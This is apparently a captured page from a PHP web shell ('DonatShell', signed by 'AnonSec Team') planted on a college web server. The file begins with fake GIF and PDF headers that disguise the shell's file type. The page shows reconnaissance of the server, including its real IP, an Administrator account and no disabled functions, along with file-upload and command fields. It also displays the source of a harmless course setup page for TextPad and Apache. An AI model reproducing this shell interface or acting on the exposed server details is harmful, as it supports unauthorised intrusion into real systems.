GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/_Archive/MMDT1021/setup/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/_Archive/MMDT1021/setup/MMDT1021Setup.php
<?
// ApacheInstall.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$thisFile=__FILE__; $thisLine=__LINE__; include('application.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Course/courseInfo.phpinc');
$title = "Setup Guide";
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageHeader.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Login/authenticate.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionHeader.phpinc');
?>
<p>Setup your computer and install the software used in class.
<br />
I get a lot of calls from students who have something not work during the class setup.
Ninty percent of the time it is because they did not follow the instructions.
<br /><span class="errorbold">Take your time and follow the instructions carefully!</span>
<br />The entire setup takes 10 to 90 minutes depending on bandwidth, computer speed, and student ability.
You should complete each setup page in its entirety but you can stop and restart between pages.
</p>
<ol class="instruction">
<li>Create a folder on your computer to keep all of your class work in. I suggest you call it MMDT1021 and place it in the root of your D: hard drive. 
	<br />If your computer does not have a D: hard drive use the C: hard drive instead. If you need to use C: you will also need to change any reference to D: to C: for all drive references throughout this class.
	<br />It should look like this:
		<br /><img src="MMDT1021folder.jpg" />
	</li>
	<li>We are going to use an editor called TextPad to write all of our web pages for this class.
		Follow the instructions in the <a href="../textpad/TextpadInstall.php" target="_blank">Textpad Installation Guide</a> to download and install the Textpad editor on your computer.
		<br />
		To write your web pages: run Textpad, enter your code, and then save them with an .htm extenstion.
		<br />
		To edit an existing web page: a) right-click on the file and select Textpad from the menu or b) open Textpad then open the file or c) open Textpad and drag/drop the file there.

	</li>
	<li>We will also be using Apache web server to serve up our web pages to the browser. Follow the instructions in the <a href="../apache/ApacheInstall.php" target="_blank">Apache Installation Guide</a> to download and install the Apache web server on your computer.
	<br />
	To view your web pages: open up a browser, type <b>localhost</b> into the address and then browse to your file.
	</li>
</ol>
If you have installed both Textpad and Apache then that's it for class Setup. You can close this window.
<?
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionFooter.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageFooter.phpinc');

?>

Anon7 - 2022
AnonSec Team